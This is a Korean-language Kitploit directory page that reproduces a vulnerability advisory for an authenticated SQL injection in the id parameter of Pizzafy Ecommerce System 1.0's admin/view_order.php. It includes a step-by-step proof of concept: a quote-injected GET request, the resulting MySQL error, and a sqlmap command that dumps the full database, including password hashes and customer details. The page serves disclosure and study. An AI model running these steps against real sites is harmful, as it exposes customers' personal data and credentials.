Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-7394-SQLI | Kitploit
도구/GitHubGitHub/xmyronn/cve-2026-7394-sqli
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingDatabase Security
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Pizzafy Ecommerce System의 SQL 인젝션 — admin/view_order.php

세부 정보

필드값
공급업체SourceCodester
제품Pizzafy Ecommerce System using PHP and MySQL
버전1.0
취약점SQL 인젝션
CWECWE-89
CVSSv3 점수7.2 (높음)
공격 벡터네트워크
인증 필요예 (관리자)
연구자Xmyronn
날짜2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


영향을 받는 구성 요소

파일: Pizzafy/admin/view_order.php
매개변수: id (GET)


설명

Pizzafy Ecommerce System 1.0의 admin/view_order.php 엔드포인트는 id GET 매개변수를 MySQL 쿼리에 전달하기 전에 제대로 검증하지 못합니다. 인증된 관리자는 이 매개변수를 조작하여 임의의 SQL을 주입할 수 있으며, 이를 통해 전체 데이터베이스가 손상될 수 있습니다.


개념 증명(PoC)

1단계 — 관리자로 로그인

다음으로 이동합니다:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

관리자 자격 증명으로 로그인합니다.

2단계 — 주문 페이지로 이동

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

아무 주문 항목에서 **주문 보기(View Order)**를 클릭합니다. Screenshot 2026-04-11 212116

3단계 — Burp Suite에서 요청 가로채기

가로챈 GET 요청은 다음과 같습니다: Screenshot 2026-04-11 212135

4단계 — SQL 오류 유발

id=1을 id='로 변경합니다: Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

응답 — MySQL 오류 노출:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

5단계 — sqlmap으로 익스플로잇

요청을 view_order.txt로 저장하고 다음을 실행합니다:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmap이 확인한 인젝션 유형:

유형설명
Boolean 기반 블라인드AND boolean-based blind — WHERE clause
오류 기반MySQL >= 5.0 FLOOR error-based
시간 기반 블라인드MySQL >= 5.0.12 SLEEP
UNION 쿼리Generic UNION query — 11 columns

전체 데이터베이스 덤프:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

노출된 민감 데이터에는 bcrypt 비밀번호 해시, 고객 이메일, 주문 세부 정보, 시스템 구성이 포함됩니다.


영향

악의적인 인증 관리자(또는 관리자 자격 증명을 획득한 공격자)는 다음을 수행할 수 있습니다:

  • 비밀번호 해시를 포함한 전체 데이터베이스 덤프
  • 고객의 민감한 개인정보(PII)(이름, 이메일, 주소, 전화번호) 열람
  • 데이터베이스에 쓰기 가능

참고 자료

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-89: SQL 명령에 사용되는 특수 요소의 부적절한 중화.
도구 다운로드